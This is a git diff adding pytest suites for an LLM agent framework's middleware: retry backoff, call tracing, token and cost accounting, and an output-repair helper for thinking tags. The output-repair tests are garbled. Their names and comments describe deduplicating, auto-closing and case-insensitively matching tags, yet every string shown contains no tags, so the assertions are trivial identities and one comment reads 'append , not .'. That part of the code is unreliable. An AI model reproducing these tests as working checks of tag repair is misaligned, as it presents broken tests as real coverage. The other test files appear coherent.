+ +from agent_core.components.middleware.llm.base import LLMCallContext +from agent_core.components.middleware.llm.retry import LLMRetryMiddleware +from agent_core.components.middleware.llm.token_accounting import ( + TokenAccountingMiddleware, +) +from agent_core.components.middleware.llm.tracing import LLMTracingMiddleware +from agent_core.llm import LLMResponse +from agent_core.messages import user_msg +from agent_core.protocols import CostSink + +# ── LLMRetryMiddleware ─────────────────────────────────────────────────── + + +def _no_sleep(monkeypatch: pytest.MonkeyPatch) -> list[float]: + """Record requested back-off delays without spending them.""" + slept: list[float] = [] + + async def _fake(delay: float) -> None: + slept.append(delay) + + monkeypatch.setattr(asyncio, "sleep", _fake) + return slept + + +@pytest.mark.asyncio +async def test_retry_asks_for_another_attempt_on_a_retryable_error( + monkeypatch: pytest.MonkeyPatch, +) -> None: + slept = _no_sleep(monkeypatch) + mw = LLMRetryMiddleware(max_retries=3, backoff_base=0.5, backoff_max=8.0) + + assert await mw.on_llm_error(LLMCallContext(), TimeoutError("timed out"), 0) is True + assert len(slept) == 1 + + +@pytest.mark.asyncio +async def test_retry_declines_a_non_retryable_error_without_sleeping( + monkeypatch: pytest.MonkeyPatch, +) -> None: + """A permanent failure must not burn wall-clock before giving up.""" + slept = _no_sleep(monkeypatch) + mw = LLMRetryMiddleware(max_retries=3) + + error = ValueError("malformed request: unknown field") + assert await mw.on_llm_error(LLMCallContext(), error, 0) is False + assert slept == [] + + +@pytest.mark.asyncio +async def test_retry_stops_at_max_retries(monkeypatch: pytest.MonkeyPatch) -> None: + slept = _no_sleep(monkeypatch) + mw = LLMRetryMiddleware(max_retries=2) + error = TimeoutError("timed out") + + assert await mw.on_llm_error(LLMCallContext(), error, 1) is True + assert await mw.on_llm_error(LLMCallContext(), error, 2) is False + assert len(slept) == 1, "the refused attempt must not sleep" + + +@pytest.mark.asyncio +async def test_retry_backoff_grows_and_is_capped( + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Exponential with jitter, clamped — the cap is the point. + + Without ``backoff_max`` a long retry chain reaches minutes per attempt, + which reads as a hang rather than a retry. + """ + slept = _no_sleep(monkeypatch) + mw = LLMRetryMiddleware(max_retries=10, backoff_base=1.0, backoff_max=4.0) + error = TimeoutError("timed out") + + for attempt in range(5): + assert await mw.on_llm_error(LLMCallContext(), error, attempt) is True + + # base * 2**attempt = 1, 2, 4, 8, 16 -> clamped to 4, plus <=0.25 jitter. + assert slept[0] == pytest.approx(1.0, abs=0.25) + assert slept[1] == pytest.approx(2.0, abs=0.25) + assert all(d <= 4.25 for d in slept), slept + assert slept[3] == pytest.approx(slept[4], abs=0.5), "both clamped" + + +# ── LLMTracingMiddleware ───────────────────────────────────────────────── + + +class _RecordingTrace: + def __init__(self) -> None: + self.calls: list[dict[str, Any]] = [] + + async def log_llm_call(self, **kwargs: Any) -> None: + self.calls.append(kwargs) + + +class _RaisingTrace: + async def log_llm_call(self, **kwargs: Any) -> None: + raise RuntimeError("trace backend down") + + +@pytest.mark.asyncio +async def test_tracing_records_duration_role_and_usage() -> None: + trace = _RecordingTrace() + mw = LLMTracingMiddleware(trace_logger=trace) + ctx = LLMCallContext(task_id="t1", role_id="writer", call_index=3) + + await mw.before_llm(ctx, [user_msg("hi")]) + await mw.after_llm( + ctx, + LLMResponse(content="ok", usage={"prompt_tokens": 11, "completion_tokens": 7}), + ) + + assert len(trace.calls) == 1 + call = trace.calls[0] + assert call["task_id"] == "t1" + assert call["agent_role_id"] == "writer" + assert call["action"] == "llm_call:3" + metadata = call["metadata"] + assert metadata["usage"] == {"prompt_tokens": 11, "completion_tokens": 7} + assert metadata["duration_ms"] >= 0 + + +@pytest.mark.asyncio +async def test_tracing_prefers_a_metadata_duration_over_the_wall_clock() -> None: + """A streamed call's real duration is stamped by the caller. + + The middleware's own timer only covers the wrapper, so for streams it would + under-report; ``ctx.metadata`` wins when present. + """ + trace = _RecordingTrace() + mw = LLMTracingMiddleware(trace_logger=trace) + ctx = LLMCallContext(task_id="t1", metadata={"duration_ms": 4321}) + + await mw.before_llm(ctx, [user_msg("hi")]) + await mw.after_llm(ctx, LLMResponse(content="ok")) + + assert trace.calls[0]["metadata"]["duration_ms"] == 4321 + + +@pytest.mark.asyncio +async def test_tracing_surfaces_fallback_markers_when_a_chain_failed_over() -> None: + trace = _RecordingTrace() + mw = LLMTracingMiddleware(trace_logger=trace) + ctx = LLMCallContext(task_id="t1", metadata={"correlation_id": "corr-9"}) + + await mw.before_llm(ctx, [user_msg("hi")]) + await mw.after_llm( + ctx, + LLMResponse( + content="ok", + response_metadata={ + "fallback_used": True, + "model_actually_used": "backup-model", + }, + ), + ) + + metadata = trace.calls[0]["metadata"] + assert metadata["fallback_used"] is True + assert metadata["model_actually_used"] == "backup-model" + assert metadata["correlation_id"] == "corr-9" + + +@pytest.mark.asyncio +async def test_tracing_returns_the_response_even_when_the_backend_raises() -> None: + """Tracing is observability: it must not be able to fail the call.""" + mw = LLMTracingMiddleware(trace_logger=_RaisingTrace()) + ctx = LLMCallContext(task_id="t1") + response = LLMResponse(content="ok") + + await mw.before_llm(ctx, [user_msg("hi")]) + assert await mw.after_llm(ctx, response) is response + + +@pytest.mark.asyncio +async def test_tracing_without_a_backend_is_a_no_op() -> None: + mw = LLMTracingMiddleware() + ctx = LLMCallContext(task_id="t1") + response = LLMResponse(content="ok") + + await mw.before_llm(ctx, [user_msg("hi")]) + assert await mw.after_llm(ctx, response) is response + + +@pytest.mark.asyncio +async def test_tracing_retains_no_instance_state_when_chat_fails() -> None: + """A terminal chat error must not leave a timer on the shared middleware.""" + mw = LLMTracingMiddleware() + ctx = LLMCallContext(task_id="t1") + + await mw.before_llm(ctx, [user_msg("hi")]) + + assert set(vars(mw)) == {"_trace"} + assert any(key.startswith("_llm_tracing_start") for key in ctx.metadata) + + +# ── TokenAccountingMiddleware.persist_cost / CostPersister ─────────────── + + +class _Tracker: + """Minimal ``CostSink`` that also answers ``get_summary``.""" + + def __init__(self, summary: dict[str, Any] | None = None) -> None: + self.summary = summary or { + "total_cost_usd": 1.25, + "total_input_tokens": 100, + "total_output_tokens": 50, + } + + def record( + self, + task_id: str, + model_name: str, + input_tokens: int, + output_tokens: int, + ) -> float: + return 0.01 + + def get_summary(self, task_id: str) -> dict[str, Any]: + return self.summary + + +class _Persister: + def __init__(self) -> None: + self.persisted: list[tuple[str, dict[str, Any], str]] = [] + + async def persist( + self, task_id: str, summary: Any, model: str, + ) -> None: + self.persisted.append((task_id, dict(summary), model)) + + +class _RaisingPersister: + async def persist(self, task_id: str, summary: Any, model: str) -> None: + raise RuntimeError("database unreachable") + + +@pytest.mark.asyncio +async def test_persist_cost_hands_the_summary_and_model_to_the_persister() -> None: + tracker = _Tracker() + persister = _Persister() + mw = TokenAccountingMiddleware(cost_sink=tracker, cost_persister=persister) + + ctx = LLMCallContext(task_id="task-7") + await mw.after_llm( + ctx, + LLMResponse( + content="ok", + model="gpt-x", + usage={"prompt_tokens": 100, "completion_tokens": 50}, + ), + ) + await mw.persist_cost("task-7") + + assert len(persister.persisted) == 1 + task_id, summary, model = persister.persisted[0] + assert task_id == "task-7" + assert summary == tracker.summary + assert model == "gpt-x", "the model observed on the call, not a re-derivation" + + +@pytest.mark.asyncio +async def test_persist_cost_is_a_no_op_without_a_persister() -> None: + """The stateless path injects neither seam, and that is not an error.""" + mw = TokenAccountingMiddleware(cost_sink=_Tracker()) + await mw.persist_cost("task-7") # must not raise + + mw_no_sink = TokenAccountingMiddleware(cost_persister=_Persister()) + await mw_no_sink.persist_cost("task-7") # must not raise + + +@pytest.mark.asyncio +async def test_persist_cost_swallows_a_failing_persister() -> None: + """Accounting is observability: a dead database must not fail the task.""" + mw = TokenAccountingMiddleware( + cost_sink=_Tracker(), cost_persister=_RaisingPersister(), + ) + await mw.persist_cost("task-7") # must not raise + + +@pytest.mark.asyncio +async def test_persist_cost_rejects_a_sink_that_cannot_summarise() -> None: + """Configuring persistence with an incomplete sink must fail loudly.""" + + class _RecordOnly: + def record( + self, + task_id: str, + model_name: str, + input_tokens: int, + output_tokens: int, + ) -> float: + return 0.0 + + persister = _Persister() + assert not isinstance(_RecordOnly(), CostSink) + with pytest.raises(TypeError, match=r"CostSink\.get_summary"): + TokenAccountingMiddleware( + cost_sink=_RecordOnly(), # type: ignore[arg-type] + cost_persister=persister, + ) diff --git a/tests/test_output_repair_shared.py b/tests/test_output_repair_shared.py new file mode 100644 index 0000000..ce28a6a --- /dev/null +++ b/tests/test_output_repair_shared.py @@ -0,0 +1,152 @@ +"""Tests for ``OutputRepairMiddleware`` — Phase 3 PR-3.3.""" + +from __future__ import annotations + +import pytest + +from agent_core.components.middleware.llm.base import LLMCallContext +from agent_core.components.middleware.llm.output_repair import ( + OutputRepairMiddleware, + repair_output_text, +) +from agent_core.llm import LLMResponse + +# ── pure helper ────────────────────────────────────────────────────────── + + +class TestRepairOutputText: + def test_empty_string_passthrough(self) -> None: + assert repair_output_text("") == "" + + def test_no_thinking_tags_only_strips_trailing_ws(self) -> None: + assert repair_output_text("hello world \n") == "hello world" + + def test_dedupes_two_consecutive_close_tags(self) -> None: + assert repair_output_text("x") == "x" + + def test_dedupes_runs_of_three_or_more(self) -> None: + out = repair_output_text("x") + assert out == "x" + + def test_dedupes_with_whitespace_between(self) -> None: + out = repair_output_text("x\n ") + assert out == "x" + + def test_dedupes_thinking_tag_variant(self) -> None: + out = repair_output_text("x") + assert out == "x" + + def test_does_not_collapse_close_tags_separated_by_text(self) -> None: + # "foo" is a malformed but distinct pattern — leave + # alone rather than risk losing the "foo" payload. + text = "afoo" + assert repair_output_text(text) == "afoo" + + def test_auto_closes_unclosed_thinking_block(self) -> None: + out = repair_output_text("oops never closed") + assert out == "oops never closed" + + def test_auto_closes_matches_first_unclosed_tag_style(self) -> None: + # Nested mix: ...... — second open never + # closes, repair should append , not . + text = "ab" + out = repair_output_text(text) + assert out == "ab" + + def test_balanced_tags_unchanged(self) -> None: + text = "step 1final answer" + assert repair_output_text(text) == text + + def test_idempotent(self) -> None: + text = "x" + once = repair_output_text(text) + assert repair_output_text(once) == once + + def test_case_insensitive_tag_matching(self) -> None: + out = repair_output_text("x") + # Dedup matches mixed case; first close is preserved verbatim. + assert out == "x" + + +# ── middleware integration ─────────────────────────────────────────────── + + +def _ctx() -> LLMCallContext: + return LLMCallContext(task_id="t", role_id="r", call_index=0) + + +@pytest.mark.asyncio +async def test_after_llm_string_content_repaired() -> None: + mw = OutputRepairMiddleware() + resp = LLMResponse(content="x") + out = await mw.after_llm(_ctx(), resp) + assert out.content == "x" + # Original is not mutated; ``dataclasses.replace`` returns a new instance. + assert resp.content == "x" + + +@pytest.mark.asyncio +async def test_after_llm_no_change_returns_same_object() -> None: + mw = OutputRepairMiddleware() + resp = LLMResponse(content="hello world") + out = await mw.after_llm(_ctx(), resp) + assert out is resp + + +@pytest.mark.asyncio +async def test_after_llm_list_content_anthropic_blocks() -> None: + mw = OutputRepairMiddleware() + resp = LLMResponse(content=[ + {"type": "text", "text": "step"}, + {"type": "tool_use", "id": "abc", "name": "search", "input": {}}, + ]) + out = await mw.after_llm(_ctx(), resp) + assert isinstance(out.content, list) + assert out.content[0]["text"] == "step" + # Non-text block forwarded untouched. + assert out.content[1] == resp.content[1] + + +@pytest.mark.asyncio +async def test_after_llm_disabled_short_circuits() -> None: + mw = OutputRepairMiddleware(enabled=False) + # The chain checks ``enabled`` before dispatching, but a direct call + # should also respect the flag for symmetry. Currently the middleware + # only signals via ``enabled``; the chain skips the call. Verify the + # property reads through. + assert mw.enabled is False + + +@pytest.mark.asyncio +async def test_after_llm_preserves_response_metadata() -> None: + mw = OutputRepairMiddleware() + resp = LLMResponse( + content="x", + response_metadata={"fallback_used": 1, "model_actually_used": "m2"}, + ) + out = await mw.after_llm(_ctx(), resp) + # ``replace(response, content=...)`` keeps every other field — the §5.9 + # fallback markers must survive PR-3.3. + assert out.response_metadata["fallback_used"] == 1 + assert out.response_metadata["model_actually_used"] == "m2" + + +@pytest.mark.asyncio +async def test_after_llm_preserves_tool_calls() -> None: + mw = OutputRepairMiddleware() + tool_call = { + "id": "call_1", + "type": "function", + "function": {"name": "search", "arguments": '{"q": "x"}'}, + } + resp = LLMResponse( + content="x", + tool_calls=[tool_call], + ) + out = await mw.after_llm(_ctx(), resp) + # ``replace`` only rewrites ``content`` — tool_calls pass through verbatim. + assert len(out.tool_calls) == 1 + assert out.tool_calls[0]["function"]["name"] == "search" + assert out.tool_calls[0]["function"]["arguments"] == '{"q": "x"}' + assert out.tool_calls[0]["id"] == "call_1" + assert out.content == "x" diff --git a/tests/test_token_accounting_shared.py b/tests/test_token_accounting_shared.py new file mode 100644 index 0000000..3801b8c --- /dev/null +++ b/tests/test_token_accounting_shared.py @@ -0,0 +1,311 @@ +"""Tests for TokenAccountingMiddleware — cumulative tracking, budget charging, SSE emission.""" + +from __future__ import annotations + +import asyncio +from unittest.mock import AsyncMock + +from agent_core.components.middleware.llm.base import LLMCallContext +from agent_core.components.middleware.llm.token_accounting import ( + TokenAccountingMiddleware, +) +from agent_core.llm import LLMResponse + +# ── Helpers ────────────────────────────────────────────────────────────── + + +def _make_response( + content: str = "hello", + input_tokens: int = 0, + output_tokens: int = 0, + format: str = "langchain", +) -> LLMResponse: + """Create an LLMResponse with token usage metadata in various provider formats. + + ``TokenAccountingMiddleware._extract_usage`` reads the native, normalised + ``LLMResponse.usage`` dict. The infra clients (OpenAI + Anthropic) flatten + every provider's raw usage into the OpenAI-wire shape + ``{prompt_tokens, completion_tokens, total_tokens, cached_tokens}`` before + it ever reaches the middleware, so the ``format`` arg here is purely a + label — all formats land in the same canonical ``usage`` field. + """ + resp = LLMResponse(content=content) + + if format in ("langchain", "openai", "anthropic"): + resp.usage = { + "prompt_tokens": input_tokens, + "completion_tokens": output_tokens, + "total_tokens": input_tokens + output_tokens, + } + elif format == "none": + pass # No usage metadata + return resp + + +# ── Token Extraction ───────────────────────────────────────────────────── + + +class TestTokenExtraction: + def test_extract_langchain_format(self): + mw = TokenAccountingMiddleware() + resp = _make_response(input_tokens=100, output_tokens=50, format="langchain") + inp, out, cr, cc = mw._extract_usage(resp) + assert inp == 100 + assert out == 50 + assert cr == 0 + assert cc == 0 + + def test_extract_openai_format(self): + mw = TokenAccountingMiddleware() + resp = _make_response(input_tokens=200, output_tokens=80, format="openai") + inp, out, _cr, _cc = mw._extract_usage(resp) + assert inp == 200 + assert out == 80 + + def test_extract_anthropic_format(self): + mw = TokenAccountingMiddleware() + resp = _make_response(input_tokens=300, output_tokens=120, format="anthropic") + inp, out, _cr, _cc = mw._extract_usage(resp) + assert inp == 300 + assert out == 120 + + def test_extract_no_usage(self): + mw = TokenAccountingMiddleware() + resp = _make_response(format="none") + inp, out, cr, cc = mw._extract_usage(resp) + assert inp == 0 + assert out == 0 + assert cr == 0 + assert cc == 0 + + +# ── Cumulative Tracking ────────────────────────────────────────────────── + + +class TestCumulativeTracking: + def test_single_call_accumulates(self): + mw = TokenAccountingMiddleware() + ctx = LLMCallContext(task_id="t1", role_id="solver") + resp = _make_response(input_tokens=100, output_tokens=50) + + loop = asyncio.new_event_loop() + loop.run_until_complete(mw.after_llm(ctx, resp)) + loop.close() + + usage = mw.get_usage("t1") + assert usage["input"] == 100 + assert usage["output"] == 50 + assert usage["total"] == 150 + assert usage["llm_calls"] == 1 + + def test_multiple_calls_accumulate(self): + mw = TokenAccountingMiddleware() + ctx = LLMCallContext(task_id="t1", role_id="solver") + + loop = asyncio.new_event_loop() + loop.run_until_complete( + mw.after_llm(ctx, _make_response(input_tokens=100, output_tokens=50)) + ) + loop.run_until_complete( + mw.after_llm(ctx, _make_response(input_tokens=200, output_tokens=80)) + ) + loop.close() + + usage = mw.get_usage("t1") + assert usage["input"] == 300 + assert usage["output"] == 130 + assert usage["total"] == 430 + assert usage["llm_calls"] == 2 + + def test_different_tasks_isolated(self): + mw = TokenAccountingMiddleware() + + loop = asyncio.new_event_loop() + loop.run_until_complete( + mw.after_llm( + LLMCallContext(task_id="t1"), + _make_response(input_tokens=100, output_tokens=50), + ) + ) + loop.run_until_complete( + mw.after_llm( + LLMCallContext(task_id="t2"), + _make_response(input_tokens=200, output_tokens=80), + ) + ) + loop.close() + + assert mw.get_usage("t1")["total"] == 150 + assert mw.get_usage("t2")["total"] == 280 + + def test_zero_tokens_skipped(self): + mw = TokenAccountingMiddleware() + ctx = LLMCallContext(task_id="t1") + resp = _make_response(format="none") + + loop = asyncio.new_event_loop() + loop.run_until_complete(mw.after_llm(ctx, resp)) + loop.close() + + usage = mw.get_usage("t1") + assert usage["total"] == 0 + assert usage["llm_calls"] == 0 + + def test_context_metadata_populated(self): + mw = TokenAccountingMiddleware() + ctx = LLMCallContext(task_id="t1", role_id="solver") + resp = _make_response(input_tokens=100, output_tokens=50) + + loop = asyncio.new_event_loop() + loop.run_until_complete(mw.after_llm(ctx, resp)) + loop.close() + + assert "token_usage" in ctx.metadata + assert ctx.metadata["token_usage"]["this_call"]["total"] == 150 + assert ctx.metadata["token_usage"]["cumulative"]["total"] == 150 + + def test_reset(self): + mw = TokenAccountingMiddleware() + ctx = LLMCallContext(task_id="t1") + + loop = asyncio.new_event_loop() + loop.run_until_complete( + mw.after_llm(ctx, _make_response(input_tokens=100, output_tokens=50)) + ) + loop.close() + + assert mw.get_usage("t1")["total"] == 150 + mw.reset("t1") + assert mw.get_usage("t1")["total"] == 0 + + +# ── Budget Charging ────────────────────────────────────────────────────── + + +class TestBudgetCharging: + def test_charges_budget_state(self): + from agent_core.execution_context import ( + ExecutionScope, + reset_current_execution_scope, + set_current_execution_scope, + ) + from agent_core.models.task_budget import BudgetState, TaskBudget + + budget_state = BudgetState(allocated=TaskBudget(max_tokens=10000)) + scope = ExecutionScope( + task_id="t1", phase_id="react_solve", role_id="solver", + metadata={"budget_state": budget_state}, + ) + token = set_current_execution_scope(scope) + + try: + mw = TokenAccountingMiddleware() + ctx = LLMCallContext(task_id="t1", role_id="solver") + resp = _make_response(input_tokens=500, output_tokens=200) + + loop = asyncio.new_event_loop() + loop.run_until_complete(mw.after_llm(ctx, resp)) + loop.close() + + assert budget_state.tokens_used == 700 + assert budget_state.llm_calls_used == 1 + assert budget_state.exhausted is False + finally: + reset_current_execution_scope(token) + + def test_budget_exhaustion_detected(self): + from agent_core.execution_context import ( + ExecutionScope, + reset_current_execution_scope, + set_current_execution_scope, + ) + from agent_core.models.task_budget import BudgetState, TaskBudget + + budget_state = BudgetState(allocated=TaskBudget(max_tokens=500)) + scope = ExecutionScope( + task_id="t1", phase_id="react_solve", role_id="solver", + metadata={"budget_state": budget_state}, + ) + token = set_current_execution_scope(scope) + + try: + mw = TokenAccountingMiddleware() + ctx = LLMCallContext(task_id="t1", role_id="solver") + resp = _make_response(input_tokens=300, output_tokens=300) + + loop = asyncio.new_event_loop() + loop.run_until_complete(mw.after_llm(ctx, resp)) + loop.close() + + assert budget_state.tokens_used == 600 + assert budget_state.exhausted is True + finally: + reset_current_execution_scope(token) + + +# ── SSE Event Emission ─────────────────────────────────────────────────── + + +class TestSSEEmission: + def test_emits_event_to_event_store(self): + event_store = AsyncMock() + mw = TokenAccountingMiddleware(event_store=event_store) + ctx = LLMCallContext(task_id="t1", role_id="solver") + resp = _make_response(input_tokens=100, output_tokens=50) + + loop = asyncio.new_event_loop() + loop.run_until_complete(mw.after_llm(ctx, resp)) + loop.close() + + event_store.append.assert_called_once() + call_kwargs = event_store.append.call_args.kwargs + assert call_kwargs["task_id"] == "t1" + payload = call_kwargs["payload"] + assert payload["trace_type"] == "token_usage" + assert payload["this_call"]["input"] == 100 + assert payload["cumulative"]["total"] == 150 + + def test_no_event_without_event_store(self): + mw = TokenAccountingMiddleware() # no event_store + ctx = LLMCallContext(task_id="t1", role_id="solver") + resp = _make_response(input_tokens=100, output_tokens=50) + + loop = asyncio.new_event_loop() + loop.run_until_complete(mw.after_llm(ctx, resp)) + loop.close() + + # No error, just no SSE + assert mw.get_usage("t1")["total"] == 150 + + def test_event_store_error_does_not_propagate(self): + event_store = AsyncMock() + event_store.append.side_effect = RuntimeError("DB error") + mw = TokenAccountingMiddleware(event_store=event_store) + ctx = LLMCallContext(task_id="t1", role_id="solver") + resp = _make_response(input_tokens=100, output_tokens=50) + + loop = asyncio.new_event_loop() + loop.run_until_complete(mw.after_llm(ctx, resp)) + loop.close() + + # Should still track tokens despite SSE failure + assert mw.get_usage("t1")["total"] == 150 + + +# ── Middleware Properties ──────────────────────────────────────────────── + + +class TestMiddlewareProperties: + def test_name(self): + mw = TokenAccountingMiddleware() + assert mw.name == "token_accounting" + + def test_enabled_by_default(self): + mw = TokenAccountingMiddleware() + assert mw.enabled is True + + def test_get_usage_unknown_task(self): + mw = TokenAccountingMiddleware() + usage = mw.get_usage("nonexistent") + assert usage["total"] == 0 + assert usage["llm_calls"] == 0 diff --git a/uv.lock b/uv.lock index 28499df..5709051 100644 --- a/uv.lock +++ b/uv.lock @@ -50,7 +50,7 @@ wheels = [ [[package]] name = "apodex-agent-core" -version = "0.5.0" +version = "0.6.0" source = { editable = "." } dependencies = [ { name = "anthropic", extra = ["bedrock"] },